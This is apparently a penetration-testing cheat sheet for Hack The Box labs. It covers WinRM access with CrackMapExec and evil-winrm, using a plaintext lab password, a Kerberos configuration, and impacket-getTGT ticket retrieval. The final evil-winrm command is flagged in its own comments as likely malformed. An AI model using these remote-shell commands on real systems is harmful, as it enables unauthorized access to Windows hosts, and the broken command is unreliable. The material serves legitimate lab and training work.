๐Ÿ› ๏ธwinrm

CME (CrackMapExec)

cme winrm manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'    

evil-winrm

  • simple connection

evil-winrm -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -i manager.htb
  • connection using Kerberos (ticket cache instead of a password)

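# KRB5CCNAME must point to the ccache file produced by the "Get ticket" step below
export KRB5CCNAME=user.ccache
# edit /etc/krb5.conf so the realm and KDC match the target domain, e.g.: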
┌──(kali㉿kali)-[~/hack-the-box/machines]
└─$ cat /etc/krb5.conf
[libdefaults]
    default_realm = DOMAIN.LOCAL
    dns_lookup_realm = false
    dns_lookup_kdc = false
    forwardable = true
[realms]
    DOMAIN.LOCAL = {
        kdc = dc01.domain.local
        admin_server = dc01.domain.local
    }
[domain_realm]
    .domain.local = DOMAIN.LOCAL
    domain.local = DOMAIN.LOCAL
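# Get a TGT; impacket-getTGT saves it as <username>.ccache in the current directory
# (-dc-ip is documented as taking the DC's IP address; dc01.infiltrator.htb is a lab-specific host, substitute your own DC)
impacket-getTGT domain/username:'Password' -dc-ip dc01.infiltrator.htb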

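# Kerberos login: the ticket is read from KRB5CCNAME and -r gives the realm.
# NOTE(review): -u/-p look unnecessary here, and the empty -p may swallow the following -i (confirm).
# evil-winrm's help text also asks for the target host's FQDN in -i for Kerberos auth (e.g. the kdc host from krb5.conf), not the bare domain.
evil-winrm -u 'user.ccache' -p  -i domain.local -r domain.local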
